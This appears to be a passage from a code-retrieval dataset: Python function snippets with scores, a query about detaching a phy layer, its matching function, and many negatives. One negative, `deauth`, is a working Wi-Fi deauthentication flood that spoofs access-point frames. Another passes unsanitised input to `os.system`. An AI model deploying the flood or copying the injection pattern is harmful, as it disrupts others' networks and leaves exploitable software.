xrange(20):\n ser.write(\"\\x00\")\n if \"BBIO1\" not in ser.read(5):\n print \"Could not get into bbIO mode\"\n sys.exit(0)\n\n # Enter UART mode\n ser.write(\"\\x03\")\n time.sleep(0.01)\n #Baud rate : 9600\n ser.write(chr(0b01100100))\n ser.read(1)\n #Peripherals : power ON / pullup ON\n ser.write(chr(0b01001100))\n ser.read(1)\n #Start UART bridge\n ser.write(chr(0b00001111))\n ser.read(1)", "def expandWithoutMutex(self, previousLayer):\n previousLayerProposition = previousLayer.getPropositionLayer()\n \"*** YOUR CODE HERE ***\"", "def test_gatt_connect_mitm_attack(self):\n gatt_server_cb = self.per_ad.droid.gattServerCreateGattServerCallback()\n gatt_server = self.per_ad.droid.gattServerOpenGattServer(\n gatt_server_cb)\n self.gatt_server_list.append(gatt_server)\n service_uuid = \"3846D7A0-69C8-11E4-BA00-0002A5D5C51B\"\n test_uuid = \"aa7edd5a-4d1d-4f0e-883a-d145616a1630\"\n bonded = False\n characteristic = self.per_ad.droid.gattServerCreateBluetoothGattCharacteristic(\n test_uuid, gatt_characteristic['property_write'],\n gatt_characteristic['permission_write_encrypted_mitm'])\n gatt_service = self.per_ad.droid.gattServerCreateService(\n service_uuid, gatt_service_types['primary'])\n self.per_ad.droid.gattServerAddCharacteristicToService(gatt_service,\n characteristic)\n self.per_ad.droid.gattServerAddService(gatt_server, gatt_service)\n result = self._find_service_added_event(gatt_server_cb, service_uuid)\n if not result:\n return False\n bluetooth_gatt, gatt_callback, adv_callback = (\n orchestrate_gatt_connection(self.cen_ad, self.per_ad))\n self.bluetooth_gatt_list.append(bluetooth_gatt)\n self.adv_instances.append(adv_callback)\n if self.cen_ad.droid.gattClientDiscoverServices(bluetooth_gatt):\n expected_event = gatt_cb_strings['gatt_serv_disc'].format(\n gatt_callback)\n try:\n event = self.cen_ad.ed.pop_event(expected_event,\n self.default_timeout)\n except Empty:\n self.log.error(gatt_cb_err['gatt_serv_disc'].format(\n expected_event))\n return False\n discovered_services_index = event['data']['ServicesIndex']\n else:\n self.log.info(\"Failed to discover services.\")\n return False\n test_value = [1, 2, 3, 4, 5, 6, 7]\n services_count = self.cen_ad.droid.gattClientGetDiscoveredServicesCount(\n discovered_services_index)\n for i in range(services_count):\n characteristic_uuids = (\n self.cen_ad.droid.gattClientGetDiscoveredCharacteristicUuids(\n discovered_services_index, i))\n for characteristic_uuid in characteristic_uuids:\n if characteristic_uuid == test_uuid:\n self.cen_ad.droid.bluetoothStartPairingHelper()\n self.per_ad.droid.bluetoothStartPairingHelper()\n self.cen_ad.droid.gattClientCharacteristicSetValue(\n bluetooth_gatt, discovered_services_index, i,\n characteristic_uuid, test_value)\n self.cen_ad.droid.gattClientWriteCharacteristic(\n bluetooth_gatt, discovered_services_index, i,\n characteristic_uuid)\n start_time = time.time() + self.default_timeout\n target_name = self.per_ad.droid.bluetoothGetLocalName()\n while time.time() < start_time and bonded == False:\n bonded_devices = \\\n self.cen_ad.droid.bluetoothGetBondedDevices()\n for device in bonded_devices:\n if ('name' in device.keys() and\n device['name'] == target_name):\n bonded = True\n break\n bonded = False\n target_name = self.cen_ad.droid.bluetoothGetLocalName()\n while time.time() < start_time and bonded == False:\n bonded_devices = \\\n self.per_ad.droid.bluetoothGetBondedDevices()\n for device in bonded_devices:\n if ('name' in device.keys() and\n device['name'] == target_name):\n bonded = True\n break\n for ad in [self.cen_ad, self.per_ad]:\n if not clear_bonded_devices(ad):\n return False\n # Necessary sleep time for entries to update unbonded state\n time.sleep(2)\n bonded_devices = ad.droid.bluetoothGetBondedDevices()\n if len(bonded_devices) > 0:\n self.log.error(\"Failed to unbond devices: {}\".format(\n bonded_devices))\n return False\n return self._orchestrate_gatt_disconnection(bluetooth_gatt,\n gatt_callback)", "def setup(wlan_type, wlan_name, alias, password, log_level):\n if alias is None:\n alias = click.prompt('Alias')\n if wlan_name is None:\n wlan_name = click.prompt(\"Wlan_name\")\n if wlan_type is None:\n wlan_type = click.prompt(\"Wlan-type\", type=click.Choice(['0', '1', '2', '3']))\n if wlan_type != '0' and password is None:\n password = getpass()\n setup_logging(log_level)\n wlan_type = int(wlan_type)\n tcp_setup(wlan_type, wlan_name, alias, password)", "def syncloss(self):\n # expect a disassociation indication with a correct status\n assert(self.a.nxapi_disassociate_ind() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def enqueue(self, packet):\n\t\tlog('queue-start %d %d' % (self.id, packet.id))\n\t\tself.queue.appendleft(packet)\n\t\tif not self.busy:\n\t\t\tsimulator.new_thread(self.__transmit())", "def connect(self, name, group, de, port, board, build):\n print 'connecting to DAC board: {} (build #{})'.format(\n self.macFor(board), build)\n\n self.boardGroup = group\n self.server = de\n self.cxn = de._cxn\n self.ctx = de.context()\n self.port = port\n self.board = board\n self.build = build\n self.MAC = self.macFor(board)\n self.devName = name\n self.serverName = de._labrad_name\n self.timeout = T.Value(1, 's')\n\n # Set up our context with the ethernet server\n # This context is expired when the device shuts down\n p = self.makePacket()\n p.connect(port)\n p.require_length(self.READBACK_LEN)\n p.destination_mac(self.MAC)\n p.require_source_mac(self.MAC)\n p.timeout(self.timeout)\n p.listen()\n yield p.send()\n\n # Get board specific information about this device.\n # We talk to the labrad system using a new context and close it when\n # done.\n reg = self.cxn.registry\n ctxt = reg.context()\n p = reg.packet()\n p.cd(['', 'Servers', 'GHz FPGAs'])\n p.get('dac' + self.devName.split(' ')[-1], key='boardParams')\n try:\n resp = yield p.send()\n boardParams = resp['boardParams']\n self.parseBoardParameters(boardParams)\n finally:\n yield self.cxn.manager.expire_context(reg.ID, context=ctxt)", "def setBw(self, newapif, mode): \n self.newapif = newapif\n bandwidth = wifiParameters.set_bw(mode)\n os.system(\"tc qdisc add dev %s root tbf rate %smbit latency 2ms burst 15k\" % (self.newapif, bandwidth))", "def connect(self, kern):\n self.driver = Board(kern)\n self.print_log(1, \"CONNECTION SUCCESSFUL\")" ]
[ "0.5359344", "0.51606864", "0.4981618", "0.49739328", "0.49689108", "0.49641663", "0.482585", "0.4784602", "0.47822216", "0.47765702", "0.4733921", "0.4723825", "0.4697315", "0.46468836", "0.46253222", "0.46140853", "0.46140155", "0.46135888", "0.45908052", "0.45793292", "0.45776454", "0.45742673", "0.45740297", "0.45740297", "0.45718834", "0.45308128", "0.45279413", "0.45242798", "0.45204872", "0.4508078", "0.45040312", "0.4501821", "0.44657657", "0.44443727", "0.44343436", "0.44330058", "0.4418028", "0.44109932", "0.43927443", "0.4387387", "0.43872634", "0.43800548", "0.4379786", "0.4361285", "0.4350801", "0.4349083", "0.43372932", "0.43370342", "0.4333077", "0.4329811", "0.4308574", "0.43032354", "0.4303217", "0.42972776", "0.42972043", "0.42965746", "0.42892408", "0.42787042", "0.4277107", "0.42737016", "0.42727795", "0.42604038", "0.42603043", "0.42574283", "0.42537433", "0.4249839", "0.4249274", "0.42461434", "0.42431885", "0.42402044", "0.422947", "0.42271227", "0.42244792", "0.4219908", "0.42165247", "0.42111513", "0.42093343", "0.4205679", "0.42051917", "0.41997868", "0.41906565", "0.41885245", "0.41881785", "0.41857627", "0.41834426", "0.41790697", "0.41712183", "0.4167612", "0.41564205", "0.415556", "0.41553047", "0.4155138", "0.41524455", "0.41484982", "0.41469646", "0.41444692", "0.41379744", "0.41361582", "0.41290686", "0.41266423" ]
0.6782705
0
Detach the given phy_layer from the channel
def detach(self, phy_layer): self._attached_phys.remove(phy_layer)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_layer(self, layer: CommandLayer):\n try:\n index = self.command_layers.index(layer)\n except ValueError:\n return\n\n if layer.active: # Transfer the active status to another layer\n if index < 0: # ... to the previous layer in the stack\n before = self.command_layers[index - 1]\n before.active = True\n elif len(self.command_layers) > 1: # ... to the next layer\n next = self.command_layers[index + 1]\n next.active = True\n\n self.command_layers.remove(layer)\n self._save()", "def remove_layer(self, layer=None):\n\t\tif layer is not None:\n\t\t\ttry:\n\t\t\t\tself.sublayers.remove(layer)\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\telif self.superlayer is not None:\n\t\t\tself.superlayer.remove_layer(self)", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):", "def port_nic_remove(switch, port):\n client.port.detach_nic(switch, port)", "def dropchan(channel):", "def remove_layer(self, layer_key_name):\n del(self.config.layers[layer_key_name])", "def detach_channel_group_from_port(self, group):\n ckresult(_dll.FMOD_System_DetachChannelGroupFromPort(self._ptr, group._ptr))", "def deconv_layer(self, dtype,\n N, C, K,\n M, P, Q,\n T=1, R=1, S=1,\n pad_d=0, pad_h=0, pad_w=0,\n str_d=1, str_h=1, str_w=1,\n dil_d=1, dil_h=1, dil_w=1):\n return layer_mkl.DeconvLayerMKL(self, dtype, N, C, K, M, P, Q, T, R, S,\n pad_d, pad_h, pad_w, str_d, str_h, str_w,\n dil_d, dil_h, dil_w)", "def add_drop_out_layer(self, input_layer):\n return tf.nn.dropout(input_layer, self.keep_prob)", "def delete_layer(LayerId=None):\n pass", "def detach_display(self, display):\n self.extra_displays.remove(display)\n self.removeDockWidget(display)\n #self.display_detached.emit(display)", "def disconnect_disk(self, instance, stg_ftsk=None, disk_type=None):\n raise NotImplementedError()", "def RemoveLayer(self, *args):\n return _XCAFDoc.XCAFDoc_LayerTool_RemoveLayer(self, *args)", "def __delitem__(self, key_mac):\n self.ingress_tbl.pop(key_mac, None)\n rsw = self.rootsw_tbl.pop(key_mac, None)\n if rsw:\n rsw.leaf_macs.discard(key_mac)", "def remove_node():\n\ttry:\n\t\tnetwork.remove_connection()\n\texcept ValueError as err:\n\t\tfeedback.config(text=err)", "def remove_layer(self, layer_pos):\n self.stack.pop(layer_pos)\n return", "def _dropout_from_layer(rng, layer, p):\r\n srng = theano.tensor.shared_randomstreams.RandomStreams(\r\n rng.randint(999999))\r\n \r\n # p=1-p because 1's indicate keep and p is prob of dropping\r\n mask = srng.binomial(n=1, p=1-p, size=layer.shape)\r\n # The cast is important because\r\n # int * float32 = float64 which pulls things off the gpu\r\n output = layer * T.cast(mask, theano.config.floatX)\r\n return output", "def detach(self):\n raise io.UnsupportedOperation", "def disconnect(src, target, reftype):", "def _dropout_from_layer(rng, layer, p):\n srng = theano.tensor.shared_randomstreams.RandomStreams(\n rng.randint(999999))\n # p=1-p because 1's indicate keep and p is prob of dropping\n mask = srng.binomial(n=1, p=1-p, size=layer.shape)\n # The cast is important because\n # int * float32 = float64 which pulls things off the gpu\n output = layer * T.cast(mask, theano.config.floatX)\n return output", "def detach(cls, factory, attrib_name):\n cls._to_attach.remove((factory, attrib_name))", "def _dropout_from_layer(rng, layer, p):\n srng = theano.tensor.shared_randomstreams.RandomStreams(\n rng.randint(999999))\n # p=1-p because 1's indicate keep and p is prob of dropping\n mask = srng.binomial(n=1, p=1.0-p, size=layer.shape)\n # The cast is important because\n # int * float32 = float64 which pulls things off the gpu\n output = layer * T.cast(mask, theano.config.floatX)\n return output", "def detach_pd(self, conn, host, pd):\n zone = self.get_zone(conn, host)\n pdhost = self.get_pd_host(conn, pd, zone)\n if pdhost == \"\":\n self.tracer.info(\n \"disk %s is already attached to %s(%s)\" % (pd, host, zone))\n elif pdhost == host:\n self.tracer.info(\"attempting to detach %s from %s(%s)\" % (pd, host, zone))\n operation = conn.instances().detachDisk(project=PROJECT, zone=zone, instance=host, deviceName=pd).execute()\n self.wait_for_operation(conn, operation, zone)\n if self.get_pd_host(conn, pd, zone) == \"\":\n self.tracer.info(\"successfully detached %s from %s(%s)\" % (pd, host, zone))", "def _DetachDisk(self, idx, root, _):\n hotmsg = \"\"\n if self.op.hotplug:\n hotmsg = self._HotplugDevice(constants.HOTPLUG_ACTION_REMOVE,\n constants.HOTPLUG_TARGET_DISK,\n root, None, idx)\n\n # Always shutdown the disk before detaching.\n ShutdownInstanceDisks(self, self.instance, [root])\n\n # Rename detached disk.\n #\n # Transform logical_id from:\n # <file_storage_dir>/<instance_name>/<disk_name>\n # to\n # <file_storage_dir>/<disk_name>\n if root.dev_type in (constants.DT_FILE, constants.DT_SHARED_FILE):\n file_driver = root.logical_id[0]\n instance_path, disk_name = os.path.split(root.logical_id[1])\n new_path = os.path.join(os.path.dirname(instance_path), disk_name)\n new_logical_id = (file_driver, new_path)\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(root, new_logical_id)])\n result.Raise(\"Failed before detach\")\n # Update logical_id\n self.cfg.SetDiskLogicalID(root.uuid, new_logical_id)\n\n # Remove disk from config\n self.cfg.DetachInstanceDisk(self.instance.uuid, root.uuid)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n return hotmsg", "def _dropout_from_layer(rng, layer, p):\n srng = theano.tensor.shared_randomstreams.RandomStreams(\n rng.randint(999999))\n # p=1-p because 1's indicate keep and p is prob of dropping\n mask = srng.binomial(n=1, p=1-p, size=layer.shape)\n # The cast is important because\n # int * float32 = float64 which pulls things off the gpu\n output = layer * T.cast(mask, theano.config.floatX) * T.cast(1./(1. - p),theano.config.floatX)\n return output", "def unsubscribe(self, tag):\n self.socket.setsockopt(constants.UNSUBSCRIBE, tag)", "def deauthentication_from_ap(self):\n # send deauthentication\n self.ap1.tx_msdu(da=self.host.macaddr, body=wifi.deauthenticate(), \n fctl=wifi.fctl_deauthentication)\n\n # expect a disassociation indication with a correct status\n assert(self.a.nxapi_disassociate_ind() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def detach(self):\n raise NotImplementedError()", "def del_connection(self, switch_name, port1, port2, bidir=False):\n raise NotImplementedError()", "def detach_updater(self, fgraph, u):\r\n if u is not None:\r\n fgraph.remove_feature(u)", "def desubscribe(self, subscription):\n try:\n if isinstance(subscription, Subscription):\n sub = DeSubscribe(subscription, self.__pool, self.myAddress)\n self.send(self.__pool, sub)\n except Exception:\n handle_actor_system_fail()", "def disconnect(scope, target) -> None:\n target.dis()\n scope.dis()", "def disconnectChannel(sock, chan):\n sock.send(\"PART {}\\r\\n\".format(chan).encode(\"utf-8\"))\n console.info(\"Successfully disconnected from {}\".format(chan))", "def deauth(self):\n # https://man7.org/linux/man-pages/man7/packet.7.html\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)\n s.bind((self.interface, 0))\n\n # The RadioTap version is always 0\n rt_version = 0\n # The padding is always 0\n rt_padding = 0\n # The empty RadioTap frame has length of 8 bytes\n rt_length = 8\n # The RadioTap flags are irrelevant\n rt_flags = 0 \n # Construct the empty RadioTap frame (1,1,2,4 bytes)\n # https://docs.python.org/3/library/struct.html\n rt_frame = struct.pack(\n 'BBHI',\n rt_version,\n rt_padding,\n rt_length,\n rt_flags\n )\n\n # The 802.11 de-authentication subtype(4bits), type(2bits), version(2bits)\n dot11_type = int(b'11000000', 2)\n # The 802.11 flags are irrelevant\n dot11_flags = 0 \n # The 802.11 duration is irrelevant\n dot11_dur = 0\n # The 802.11 receiver address\n dot11_ra = bytes(map(lambda x: int(x, 16) , self.target_addr.split(':')))\n # The 802.11 transmitter address\n dot11_ta = bytes(map(lambda x: int(x, 16) , self.access_point.split(':')))\n # The 802.11 access point address\n dot11_ap = dot11_ta\n # The 802.11 sequence control is irrelevant\n dot11_sc = 0\n # The 802.11 reason code is irrelevant (0 is fine)\n dot11_reason = 0\n # Construct the 802.11 frame (1,1,2,6,6,6,2,2 bytes)\n # https://docs.python.org/3/library/struct.html\n dot11_frame = struct.pack(\n 'BBH6s6s6sHH',\n dot11_type,\n dot11_flags,\n dot11_dur,\n dot11_ra,\n dot11_ta,\n dot11_ap,\n dot11_sc,\n dot11_reason\n )\n\n # Construct the full payload (RadioTap + 802.11)\n payload = rt_frame + dot11_frame \n\n # Send packets while running and sending\n while 1:\n while self.sending:\n s.send(payload)\n time.sleep(1)", "def remove_descriptor(self, uuid):", "def UnSetOneLayer(self, *args):\n return _XCAFDoc.XCAFDoc_LayerTool_UnSetOneLayer(self, *args)", "def del_edge (self, src, dst):\n raise NotImplementedError", "def DeleteLayer(self, event):\n pass", "def detach_volume(self, host_path: str):\n del self.volumes[host_path]", "def disconnect_subscriber(reply_channel):\n try:\n send_disc_message_to_channel(reply_channel)\n except Exception as exc:\n print(str(exc))\n\n disconnect_in_subscribers(reply_channel)", "def delete_layer(self, index) :\n \n # Remove the actor, delete the list item, and update the other layers.\n self._renderer.RemoveActor(self._layers[index].actor)\n del self._layers[index]\n self._update_layers_positions()", "def DisconnectByEdgeInNetwork(self, edge):\n try:\n self.connections.remove((edge.node1, edge.node2))\n edge.node1.removeNeighbour(edge.node2.index)\n except Exception as exc:\n print(\"Exception {} occured when trying to disconnect the edge\".format(exc))", "def rmv_chnl(self, chnl):\n\n chnl = self.chnls.pop(self.chnls.index(chnl))\n\n self.channels_layout.removeWidget(chnl)\n\n chnl.setParent(None)", "def _clearLayer(self, layer=0):\n for i in self._existingLayerItems(layer):\n self._plt.removeItem(i)", "def unplug(self, instance_id, hyper_vif):\n return self.client.cast(self.context,\n 'unplug',\n instance_id=instance_id,\n hyper_vif=hyper_vif)", "def dropout_from_layer(rng, layer, p):\n\n srng = theano.tensor.shared_randomstreams.RandomStreams(rng.randint(999999))\n mask = srng.binomial(n=1, p=1-p, size=layer.shape)\n output = layer * T.cast(mask, theano.config.floatX)\n return output", "def fusion_api_delete_ethernet_network(self, name=None, uri=None, param='', api=None, headers=None):\n return self.ethernet_network.delete(name=name, uri=uri, param=param, api=api, headers=headers)", "def detach_tool_controller(*args):\n selection = pm.ls(selection=True)\n\n tools = 0 # Keep track of whether or not we have any tools\n for sel in selection:\n # Check if the selection is part of a valid robot\n if get_robot_roots(sel=[sel]):\n # Check if the selection is a valid tool controller\n if 'tool_CTRL' in str(sel):\n # If so unlock the robot's target_CTRL translate and\n # rotate attributes and parent the tool_CTRL to the world\n robot = get_robot_roots(sel=[sel])[0]\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_fk_path = get_tool_ctrl_fk_path(robot)\n\n pm.delete(target_ctrl_path + '|targetToToolCtrl_pCnst')\n pm.delete(tool_ctrl_fk_path)\n\n try: \n pm.setAttr(target_ctrl_path + '.translate', lock=False)\n pm.setAttr(target_ctrl_path + '.rotate', lock=False)\n except:\n pm.warning('Mimic: target_CTRL.translate is from a referenced file, and cannot be unlocked.')\n\n pm.parent(sel, world=True, absolute=True)\n tools = 1 # Our selection is a tool controller\n pm.headsUpMessage('Tool Controller detached successfuly!')\n\n # If there were no tools in our selection, alert the user\n if not tools:\n pm.warning('No tool controllers selected')\n return", "def del_router_info(self):\n debug.info(0,\"Erasing router info\")\n layer_num = techlayer[\"text\"]\n self.cell.objs = [x for x in self.cell.objs if x.layerNumber != layer_num]", "def disconnect(self, driver):\n self.device.ctrl.sendline('\\x03')\n self.device.ctrl.sendline('\\x04')", "def unplug(self, bridge):\n ovsdb = self.bridge.ovsdb\n with ovsdb.transaction() as txn:\n if self.bridge.exists():\n txn.add(ovsdb.del_port(self.patch_port_trunk_name,\n self.bridge.br_name))\n txn.add(ovsdb.del_port(self.patch_port_int_name,\n bridge.br_name))", "def detach_typed_link(self, typed_link_specifier: Dict[str, Any]):\n return cd_client.detach_typed_link(\n DirectoryArn=self._dir_arn,\n TypedLinkSpecifier=typed_link_specifier\n )", "def attach(self, phy_layer):\n self._attached_phys.append(phy_layer)", "def _DisconnectAP(self):\n disconnect_command = 'iw dev {interface} disconnect'.format(\n interface=self.interface)\n # This call may fail if we are not connected to any network.\n self._device.Call(disconnect_command)", "def disassociation_from_ap(self):\n # send disassociation\n self.ap1.tx_msdu(da=self.host.macaddr, body=wifi.disassociation(), \n fctl=wifi.fctl_disassociation)\n \n # expect a deauth frame\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n \n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_deauthentication)\n \n # expect a disassociation indication with a correct status\n assert(self.a.nxapi_disassociate_ind() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def detached(self, mind):\n self.remote = None\n players.remove(self)", "def detachDiskFromMinipad(self , disk):\n return", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):\n vhd_name = connection_info['data']['disk_name']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n not_found = True\n for i in range(len(data_disks)):\n if vhd_name == data_disks[i].name:\n del data_disks[i]\n not_found = False\n break\n if not_found:\n LOG.info(_LI('Volume: %s was not attached to Instance!'),\n vhd_name, instance=instance)\n return\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Detach Volume to Instance in Azure finish\"),\n instance=instance)", "def do_network_detach(cs, args):\n opts = {}\n opts['container'] = args.container\n opts['network'] = args.network\n opts['port'] = args.port\n opts = zun_utils.remove_null_parms(**opts)\n try:\n cs.containers.network_detach(**opts)\n print(\"Request to detach network from container %s \"\n \"has been accepted.\" % args.container)\n except Exception as e:\n print(\"Detach network from container %(container)s \"\n \"failed: %(e)s\" % {'container': args.container, 'e': e})", "async def unlink(self, ctx: MyContext):\n query = \"SELECT * FROM wormhole_channel WHERE channelID = ?\"\n wh_channel = self.bot.db_query(\n query, (ctx.channel.id,), astuple=True, fetchone=True\n )\n # comes as: (name, channelID, guildID, type, webhookID, webhookTOKEN)\n if len(wh_channel) == 0:\n await ctx.send(await self.bot._(ctx.guild.id, \"wormhole.error.not-linked\"))\n return\n query = \"DELETE FROM wormhole_channel WHERE channelID = ? AND name = ?\"\n async with ClientSession() as session:\n webhook = discord.Webhook.partial(\n wh_channel[4], wh_channel[5], session=session\n )\n await webhook.delete()\n self.bot.db_query(query, (wh_channel[0], ctx.channel.id))\n await ctx.send(\n await self.bot._(ctx.guild.id, \"wormhole.success.channel-unlinked\")\n )", "def dmcrypt_unmap(\n _uuid\n ):\n args = [\n 'cryptsetup',\n 'remove',\n _uuid\n ]\n\n try:\n command_check_call(args)\n\n except subprocess.CalledProcessError as e:\n raise Error('unable to unmap device', _uuid, e)", "def disconnect_disk_from_mgmt(self, vios_uuid, disk_name):\n raise NotImplementedError()", "def deauthentication_from_user(self):\n # disassociate\n self.a.nxapi_disassociate_req(self.ap1.macaddr)\n \n # expect a deauth frame\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n \n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_deauthentication)\n \n # expect a disassociation confirmation with a correct status\n assert(self.a.nxapi_disassociate_cfm() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def unlink_from(self, criterion_or_node):\n if callable(criterion_or_node):\n target_node = criterion_or_node(self.graph.handle)\n else:\n target_node = criterion_or_node\n self.send(target_node, 'drop_link',\n originating_node=self.id)", "def pcp_detach_node(self, nid):\n\t\treturn self._pcp_detach_node(nid, False)", "def dropout(self, input_layer, keep_prob=0.5):\n if self.is_training:\n dtype = input_layer.dtype\n with tf.variable_scope(self._count_layer('dropout')):\n keep_prob_tensor = tf.constant(keep_prob, dtype=dtype)\n return tf.nn.dropout(input_layer, keep_prob_tensor)\n else:\n return input_layer", "def unregister(self, parent):\n parent.unregisterCommand('LayerData')\n parent.unregisterCommand('LayerDataDecoded')", "def unsubscribe_symbol(self, symbol):\n try:\n self.symbol.pop(symbol, None)\n self.symbol_data.pop(symbol, None)\n except KeyError:\n print(\"Could not unsubscribe symbol {} as it was never subscribed.\".format(str(symbol)))", "def detach_rule(self, detach_rule):\n\n self._detach_rule = detach_rule", "def remove_peer(self, writer):\r\n address = self.get_address_string(writer)\r\n self.connection_pool[address] = writer\r\n logger.info(\"Removed peer to pool\", address=address)", "def unplug(self, bridge):\n ovsdb = self.bridge.ovsdb\n with ovsdb.transaction() as txn:\n txn.add(ovsdb.del_port(self.patch_port_int_name,\n bridge.br_name))", "def drop_channel(self, channel):\n return self.clients.pop(channel, None)", "def disconnectJoint(*args, attachHandleMode: bool=True, deleteHandleMode: bool=True,\n **kwargs)->AnyStr:\n pass", "def deallocate_for_instance(self, context, instance, **kwargs):\n args = kwargs\n args['instance_id'] = instance['id']\n args['project_id'] = instance['project_id']\n rpc.cast(context, FLAGS.network_topic,\n {'method': 'deallocate_for_instance',\n 'args': args})", "def network_delete(auth=None, **kwargs):\n cloud = get_operator_cloud(auth)\n kwargs = _clean_kwargs(**kwargs)\n return cloud.delete_network(**kwargs)", "def disconnect(self):\n \n self.net.active(False)", "def detach_plot(self):\n detached = tk.Toplevel(self)\n detached.wm_title(\"Glycoprotein\")\n fig = mpl.figure.Figure(figsize=(5, 4), dpi=100)\n ax = fig.add_subplot(111)\n chid = self.chain.get()\n\n l = len(self.myGlycosylator.sequences[chid])\n sequons = [k for k in self.myGlycosylator.sequons.keys() if chid in k[:len(chid)]]\n trees = self.original_glycans.copy()\n trees.update(self.linked_glycans)\n self.myDrawer.draw_glycoprotein(l, self.myGlycosylator.get_start_resnum(chid), sequons, ax = ax, axis = 0,\n trees = trees, names = self.names, sequon_color = self.sequon_colors)\n ax.axis('equal')\n ax.axis('off')\n\n canvas = FigureCanvasTkAgg(fig, master=detached)\n canvas.show()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n toolbar = NavigationToolbar2TkAgg(canvas, detached)\n toolbar.update()\n canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)", "def remove_edge(self, edge: Edge) -> Edge:", "def disconnect(cnxDict):\n for i, jnt in enumerate(cnxDict[\"joints\"]):\n # we don't need to disconnect blended joint since the connection is\n # from other joints\n if not jnt.startswith(\"blend_\"):\n oJnt = pm.PyNode(jnt)\n\n for e, chn in enumerate(SRT_CHANNELS):\n plug = oJnt.attr(chn)\n if cnxDict[\"attrs\"][i][e]:\n pm.disconnectAttr(cnxDict[\"attrs\"][i][e], plug)\n if cnxDict[\"attrs\"][i][13]:\n pm.disconnectAttr(\n oJnt.parentInverseMatrix[0], cnxDict[\"attrs\"][i][13])", "def detach(self):\n # if i don't have an existing connection to the back end, do nothing\n if self.connection is None: return\n\n # otherwise, close the connection\n status = self.postgres.disconnect(self.connection)\n # invalidate the member\n self.connection = None\n\n # and return the status\n return status", "def off(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n if self._pre_off_func:\n self._pre_off_func()\n switchboard = self._get_switchboard_if_initialized()\n if self._power_and_data_share_cable:\n if switchboard:\n switchboard.add_log_note(\n f\"comm_power.off() called on {self._device_name} set communication \"\n f\"port {self.port_number} to charge as device has a single USB \"\n \"cable for data and power.\")\n switchboard.close_all_transports()\n self._hub.switch_power.power_on(self.port_number, data_sync=False)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_on(\n self.secondary_port_number, data_sync=False)\n else:\n if switchboard:\n switchboard.close_all_transports()\n self._hub.switch_power.power_off(self.port_number)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_off(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_off()", "async def removejoinchannel(self, ctx: commands.Context, channel: discord.TextChannel):\n db_session = self.bot.create_db_session()\n\n try:\n existing = db_session.query(Channel).filter(Channel.id == channel.id).one()\n existing.joinable = False\n except NoResultFound:\n await ctx.send(f\"There was no record for {channel.mention}. The channel is not currently joinable.\")\n return\n\n db_session.commit()\n db_session.close()\n await ctx.send(f\"{channel.mention} was removed as a joinable channel.\")", "def detach_volume(self,\n connection_info,\n instance,\n mountpoint,\n encryption=None):\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n name = volume_data['name']\n filtered_disks = [disk for disk in data_disks if disk.name != name]\n if len(filtered_disks) == len(data_disks):\n LOG.error(\"Volume %s was not attached to instance %s\" %\n (name, instance.uuid))\n return\n azure_instance.storage_profile.data_disks = filtered_disks\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Detached volume %s from instance %s\" % (name, instance.uuid))", "def remove_device(hass: HomeAssistant, mac: str):\n registry = dr.async_get(hass)\n device = registry.async_get_device({(DOMAIN, mac)}, None)\n if device:\n registry.async_remove_device(device.id)", "async def async_unjoin_me(self):\n if self._multiroom_wifidirect:\n for dev in self._multiroom_group:\n for device in self.hass.data[DOMAIN].entities:\n if device._is_master: ## TODO!!!\n cmd = \"multiroom:SlaveKickout:{0}\".format(self._slave_ip)\n value = await self._master.async_call_linkplay_httpapi(cmd, None)\n self._master._position_updated_at = utcnow()\n\n else:\n cmd = \"multiroom:Ungroup\"\n value = await self.async_call_linkplay_httpapi(cmd, None)\n\n if value == \"OK\":\n if self._master is not None:\n await self._master.async_remove_from_group(self)\n # await self._master.async_schedule_update_ha_state(True)\n self._multiroom_unjoinat = utcnow()\n self._master = None\n self._is_master = False\n self._slave_mode = False\n self._slave_ip = None\n self._multiroom_group = []\n # await self.async_schedule_update_ha_state(True)\n\n else:\n _LOGGER.warning(\"Failed to unjoin_me from multiroom. \" \"Device: %s, Got response: %s\", self.entity_id, value)", "def unsubscribe(self, channel, update_handler=None):\n pass", "def protocol(ctx: Context, public_id: PublicId):\n _eject_item(ctx, \"protocol\", public_id)", "def disconnect(self):\n self.blnkt.disconnect()", "def remove_connection(self, var1, var2):\n conn, swap = 